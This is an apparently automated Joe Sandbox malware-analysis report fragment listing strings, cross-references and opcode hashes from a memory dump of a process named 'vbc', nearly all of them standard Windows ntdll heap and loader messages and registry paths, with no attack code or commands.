                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                            Strings
                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0519855E
                            • @, xrefs: 05198591
                            • minkernel\ntdll\ldrinit.c, xrefs: 05198421
                            • LdrpInitializeProcess, xrefs: 05198422
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                            Strings
                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 051D21D9, 051D22B1
                            • .Local, xrefs: 051928D8
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 051D22B6
                            • SXS: %s() passed the empty activation context, xrefs: 051D21DE
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                            Strings
                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 051C1028
                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 051C106B
                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 051C10AE
                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 051C0FE5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                            Strings
                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 051CA992
                            • LdrpDynamicShimModule, xrefs: 051CA998
                            • minkernel\ntdll\ldrinit.c, xrefs: 051CA9A2
                            • apphelp.dll, xrefs: 05182462
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: $ $0
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                            Strings
                            • HEAP[%wZ]: , xrefs: 05161712
                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05161728
                            • HEAP: , xrefs: 05161596
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: FilterFullPath$UseFilter$\??\
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: %$&$@
                            Strings
                            • TargetNtPath, xrefs: 0523B82F
                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0523B82A
                            • GlobalizationUserSettings, xrefs: 0523B834
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                            Strings
                            • HEAP[%wZ]: , xrefs: 051BE6A6
                            • HEAP: , xrefs: 051BE6B3
                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 051BE6C6
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                            Strings
                            • minkernel\ntdll\ldrmap.c, xrefs: 051CA59A
                            • LdrpCompleteMapModule, xrefs: 051CA590
                            • Could not validate the crypto signature for DLL %wZ, xrefs: 051CA589
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                            Strings
                            • minkernel\ntdll\ldrinit.c, xrefs: 051D82E8
                            • Failed to reallocate the system dirs string !, xrefs: 051D82D7
                            • LdrpInitializePerUserWindowsDirectory, xrefs: 051D82DE
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                            Strings
                            • minkernel\ntdll\ldrtls.c, xrefs: 051D1B4A
                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 051D1B39
                            • LdrpAllocateTls, xrefs: 051D1B40
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                            Strings
                            • @, xrefs: 0521C1F1
                            • PreferredUILanguages, xrefs: 0521C212
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0521C1C5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                            Strings
                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 051E4888
                            • minkernel\ntdll\ldrredirect.c, xrefs: 051E4899
                            • LdrpCheckRedirection, xrefs: 051E488F
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                            Strings
                            • @, xrefs: 051EB670
                            • GlobalFlag, xrefs: 051EB68F
                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 051EB632
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                            Strings
                            • minkernel\ntdll\ldrtls.c, xrefs: 051D1A51
                            • DLL "%wZ" has TLS information at %p, xrefs: 051D1A40
                            • LdrpInitializeTls, xrefs: 051D1A47
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                            Strings
                            • Process initialization failed with status 0x%08lx, xrefs: 051E20F3
                            • LdrpInitializationFailure, xrefs: 051E20FA
                            • minkernel\ntdll\ldrinit.c, xrefs: 051E2104
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: $$$
                            Strings
                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0516063D
                            • kLsE, xrefs: 05160540
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                            Strings
                            • RtlpInitializeAssemblyStorageMap, xrefs: 051D2A90
                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 051D2A95
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Cleanup Group$Threadpool!
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: MUI
                            • API String ID: 0-1339004836
                            Similarity
                            • API ID:
                            • String ID: GlobalTags
                            • API String ID: 0-1106856819
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            Similarity
                            • API ID:
                            • String ID: $aD
                            • API String ID: 0-45832813
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            Similarity
                            • API ID:
                            • String ID: EXT-
                            • API String ID: 0-1948896318
                            Similarity
                            • API ID:
                            • String ID: BinaryHash
                            • API String ID: 0-2202222882
                            Similarity
                            • API ID:
                            • String ID: verifier.dll
                            • API String ID: 0-3265496382
                            Similarity
                            • API ID:
                            • String ID: kLsE
                            • API String ID: 0-3058123920
                            Similarity
                            • API ID:
                            • String ID: #
                            • API String ID: 0-1885708031
                            Similarity
                            • API ID:
                            • String ID: Flst
                            • API String ID: 0-2374792617
                            Similarity
                            • API ID:
                            • String ID: L4_wL4_w
                            • API String ID: 0-4042522810
                            Similarity
                            • API ID:
                            • String ID: Actx
                            • API String ID: 0-89312691
                            Similarity
                            • API ID:
                            • String ID: LdrCreateEnclave
                            • API String ID: 0-3262589265
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bca2360e958f0e3b639d9321d80df46e32b4de629da33b208237a17bd4b311a8
                            • Instruction ID: 33783dd777db171599c2f6f5f9e1adb9cfc3a19ca9d984235487869a51f6adee
                            • Opcode Fuzzy Hash: bca2360e958f0e3b639d9321d80df46e32b4de629da33b208237a17bd4b311a8
                            • Instruction Fuzzy Hash: C051BEB5604340ABD721FF24D889F6BB7A8EF85724F10062DF911971D2DB34E841CBA2
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                            • Instruction ID: dd3bab1f72db684fff4b102a3302cf68663bd6e5fb2866e4bda86cb29ce16782
                            • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                            • Instruction Fuzzy Hash: F251F2766042129BCB21EF64AC44A7BB7F6FF84248F040869F946C7251EB35D856C7F2
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b5b140f8092240c88d7fb608ebd5e1e0146def1430d3e1b4ea48190732711671
                            • Instruction ID: 5c95558c1d91039c573a28cc0c21b898a072895a8df0622e289d1eb699894988
                            • Opcode Fuzzy Hash: b5b140f8092240c88d7fb608ebd5e1e0146def1430d3e1b4ea48190732711671
                            • Instruction Fuzzy Hash: C1518D75A00248ABEB32AFA4CC85BFDBBB5FF01300F60096EE595A7191DB729944DF14
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b7bf7c83a92ac851db9fc5703db3f3282db0f7d7347c847344eeb272ab8f662d
                            • Instruction ID: 6a84045d7f493c135e74c418efb2eae5133a722414d3b6823cfd9b70afca95dc
                            • Opcode Fuzzy Hash: b7bf7c83a92ac851db9fc5703db3f3282db0f7d7347c847344eeb272ab8f662d
                            • Instruction Fuzzy Hash: 3F515575A0061AAFC325CF6CC484BA9B7B1FF04710F158AA9E865CB340E734E992DBC0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed469e4119f6a36e44ff23fae6f728cc3ccb447cb7e94036af92df804e57a56e
                            • Instruction ID: d72eabb28e886c9e4b470198494cf787c856f66bbc8aa9b3116cafeea03f9ba9
                            • Opcode Fuzzy Hash: ed469e4119f6a36e44ff23fae6f728cc3ccb447cb7e94036af92df804e57a56e
                            • Instruction Fuzzy Hash: F7518C71200A08DFDB26EF68C984EAAB3FEFF04750F51092AE51697661D730ED41CB61
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d9135dad387798f3da7d5043b37774f89ec65143f4f9511635e01e811996a282
                            • Instruction ID: a8de60e884d57a4479a45f0faeb0ef931d27a2806c0534fc45a194bb5b090251
                            • Opcode Fuzzy Hash: d9135dad387798f3da7d5043b37774f89ec65143f4f9511635e01e811996a282
                            • Instruction Fuzzy Hash: 2651F131A44605EFEB19EF64C948BBDBBB6FF14319F1040AAE513932D0DB749921CB80
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                            • Instruction ID: 51b957c82e9f1ef4a8931a98e6313e131f2e4699c6084a4d9abebafc5fc0fac0
                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                            • Instruction Fuzzy Hash: E151AF71E0461AABCF26EF94C444BFEBBB5AF44754F05406AE901AB240DB74D944CFA0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be867db1ebea5ecfca51919caf80cf4d8f4402b4c52afec3f914cb8fa494b7af
                            • Instruction ID: 15a7782bc001a7c70a1d9f45f346bb969f597a5b53e554d037a96883cd3c9978
                            • Opcode Fuzzy Hash: be867db1ebea5ecfca51919caf80cf4d8f4402b4c52afec3f914cb8fa494b7af
                            • Instruction Fuzzy Hash: A1518B31B05315DBDF25DBA8D848FEDB7B6BF08B14F920058E842EB251D7B5A960CB60
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32c7fa72dc4fa4b26b20b13d0634ea4a183612e80c235c4662c6451e22e01347
                            • Instruction ID: 4dfafc1d71ba212c0aef47f1606ae4cb8fab95ac3094b9cc942d424d014199f3
                            • Opcode Fuzzy Hash: 32c7fa72dc4fa4b26b20b13d0634ea4a183612e80c235c4662c6451e22e01347
                            • Instruction Fuzzy Hash: 5F417977D04229ABCB2AEBA89884ABFBABDAF04654F050566E901E7201D735DD01C7E1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                            • Instruction ID: eca9d54c5da485fa4bf78d36c3e0cc8082f35dde9039f8a024151d1f1e3bb16a
                            • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                            • Instruction Fuzzy Hash: 74517CB1610606EFCB15CF14C581A66FBB6FF55304F1585BAE8089F222E771EA86CF90
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5c4e961fe601bec2117b127891a55b04b4d82dba0ef227fb6dcce5dbe6c4768d
                            • Instruction ID: a3328c8013af4bf55ec0cddfdd7c309ee3c87278524fb9120ed6985cc54159d0
                            • Opcode Fuzzy Hash: 5c4e961fe601bec2117b127891a55b04b4d82dba0ef227fb6dcce5dbe6c4768d
                            • Instruction Fuzzy Hash: F241F671754301EBDF2DEE68A889F6ABB66EF45704F410028FD06DB281EB719C84C7A1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e199d657135d0587e2ded14cf70ee03cb455e553e6f731909e7741b3e409e28
                            • Instruction ID: 3400494d3186628b0246870ccf81f2901da5e27eeaf982e28201169ff3e2da7b
                            • Opcode Fuzzy Hash: 6e199d657135d0587e2ded14cf70ee03cb455e553e6f731909e7741b3e409e28
                            • Instruction Fuzzy Hash: E551DF32308691CFC725CB18D444F6AB7F6BB44B54F0A48A9F8128BB91D739DC50CB62
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8eb73082833616b143ec5789452b3d367d0b927e459538c24595bb66eb45d73c
                            • Instruction ID: 54de1acf44f1bd8745c90a0586c76baed7fed4b77537eb0fa00eca53cf91ce96
                            • Opcode Fuzzy Hash: 8eb73082833616b143ec5789452b3d367d0b927e459538c24595bb66eb45d73c
                            • Instruction Fuzzy Hash: FE418A36A042199BCF28DF98C448AEEF7B5BF4C710F15816AE816E7250E735AD41CBA4
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                            • Instruction ID: 45c1bead85c0f298ca8dd5beaeb0ae103d140baa5053e1fe91766d7ec66f7eaa
                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                            • Instruction Fuzzy Hash: 79514A75A00615DFCB15CF98C580ABEF7B2FF84724F2881A9D815A7350D730AE42CBA0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                            • Instruction ID: efef04da10d61466dfdd94a5c45c4bb08f21e5114f249067e975184f1514eeff
                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                            • Instruction Fuzzy Hash: 56512971A04205DFCB18CFA9D481AA9FBF1FF48314B14856ED81A97345D734EA80CFA0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f7f8b69a0bd647419af1f3350023fc4f21deb9a733629f934b1001d5dfb003a
                            • Instruction ID: da0c0bbe270b8ef54b891a04339ed32ab94251f923377e7c9ac64a33bfed84f7
                            • Opcode Fuzzy Hash: 2f7f8b69a0bd647419af1f3350023fc4f21deb9a733629f934b1001d5dfb003a
                            • Instruction Fuzzy Hash: E4511770A04256DBDB25CB28CC08BF8BBB6FF05314F1482E9D429976D1DB35A991CF40
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f1f54982964575f6957189fef8dc10e488850cc0978f16ddd3b5cba81ab0824c
                            • Instruction ID: 8296737d0d9d01876495602f63e6761180f8154859ba96e2d368824199d3c2a9
                            • Opcode Fuzzy Hash: f1f54982964575f6957189fef8dc10e488850cc0978f16ddd3b5cba81ab0824c
                            • Instruction Fuzzy Hash: E441D371644605EFDB25EF64C844B6ABBFAFF40764F414429E922CB291D7B4EC40CBA0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
